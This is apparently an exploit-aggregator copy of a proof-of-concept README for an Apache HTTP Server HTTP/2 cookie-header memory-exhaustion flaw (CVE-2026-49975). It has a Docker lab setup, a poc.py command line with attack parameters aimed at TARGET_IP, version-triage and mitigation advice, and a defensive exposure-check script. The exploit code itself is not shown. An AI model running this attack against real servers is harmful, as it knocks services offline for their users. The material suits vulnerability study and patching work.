## https://sploitus.com/exploit?id=5B7082BE-022C-5DCA-BCDA-0F8EDD0E5085
# CVE-2026-49975 HTTP/2 Bomb
CVE-2026-49975 HTTP/2 Bomb PoC
# Overview
> **CVE-2026-49975** is a **Denial of Service (DoS)** vulnerability in **Apache HTTP Server**.
> The vulnerability occurs in the HTTP/2 request handling path, where multiple `cookie` header fields can be merged without being properly counted against `LimitRequestFields`.
> By sending a small HPACK-encoded HTTP/2 request that expands into many `cookie` header fields, an attacker can force the server to repeatedly allocate memory during Cookie header merging.
> The attacker can then use HTTP/2 flow control to delay response transmission, keeping the affected streams open and preventing the allocated memory from being released.
# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | Apache HTTP Server **2.4.17 ≤ version ≤ 2.4.67** |
| **Patched** | Apache HTTP Server **2.4.68 or later** |
# Impact
- Remote Denial of Service (DoS)
- Excessive memory consumption
- Delayed or failed processing of normal user requests
# Environment
Build and run the vulnerable Apache HTTP Server environment.
```bash
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
```
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.
## Step 1. Monitor server memory usage
```bash
docker stats cve-2026-49975
```
Example output:
```
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
```
## Step 2. Run the HTTP/2 Bomb PoC
Run `poc.py` against the vulnerable environment with the following options.
```bash
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
```
## Step 3. Confirm the result
Check that the Apache container's memory usage increases and remains high while the attack streams are held open.
# Mitigation
- Upgrade Apache HTTP Server to 2.4.68 or later
- Consider disabling HTTP/2 temporarily if the service does not require it
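
The affected-version table and the mitigation list above reduce to two checks per host: is the httpd version inside 2.4.17 to 2.4.67, and does an active `Protocols` directive offer `h2` or `h2c`. The script below is an added example, not part of the PoC repository; its function names and sample inputs are made up for illustration, and it assumes the config text it receives is the fully merged configuration (with no `Protocols` directive, Apache serves `http/1.1` only).

```bash
#!/bin/sh
# Added example (not from the PoC repository): exposure triage for CVE-2026-49975.
# The affected range 2.4.17..2.4.67 is taken from the table on this page.

# Pull "2.4.62" out of `httpd -v` output read from stdin.
extract_version() {
    sed -n 's|.*Apache/\([0-9][0-9.]*\).*|\1|p' | head -n 1
}

# 0 = inside the affected range, 1 = outside, 2 = unparseable version string.
is_vulnerable_version() {
    ver=$1
    case $ver in ''|*[!0-9.]*|.*|*.|*..*) return 2 ;; esac
    old_ifs=$IFS; IFS=.; set -- $ver; IFS=$old_ifs
    [ $# -eq 3 ] || return 2
    [ "$1" -eq 2 ] && [ "$2" -eq 4 ] && [ "$3" -ge 17 ] && [ "$3" -le 67 ]
}

# 0 if any active (uncommented) Protocols directive on stdin offers h2 or h2c.
h2_offered() {
    awk 'tolower($1) == "protocols" {
             for (i = 2; i <= NF; i++)
                 if (tolower($i) == "h2" || tolower($i) == "h2c") found = 1
         }
         END { exit (found ? 0 : 1) }'
}

# $1 = `httpd -v` output, $2 = merged config text; prints one verdict word.
assess() {
    v=$(printf '%s\n' "$1" | extract_version)
    rc=0; is_vulnerable_version "$v" || rc=$?
    case $rc in
        1) echo "version-not-affected"; return 0 ;;
        2) echo "version-unknown"; return 0 ;;
    esac
    if printf '%s\n' "$2" | h2_offered; then
        echo "exposed-upgrade-or-disable-h2"
    else
        echo "affected-version-h2-not-offered"
    fi
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_BANNER='Server version: Apache/2.4.62 (Unix)'
SAMPLE_CONF='# Protocols h2c http/1.1
Protocols h2 http/1.1'
assess "$SAMPLE_BANNER" "$SAMPLE_CONF"
```

Distribution packages sometimes backport fixes without changing the version string, so treat a version match as a prompt to check the vendor advisory.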
# Analysis
- KR:
- EN: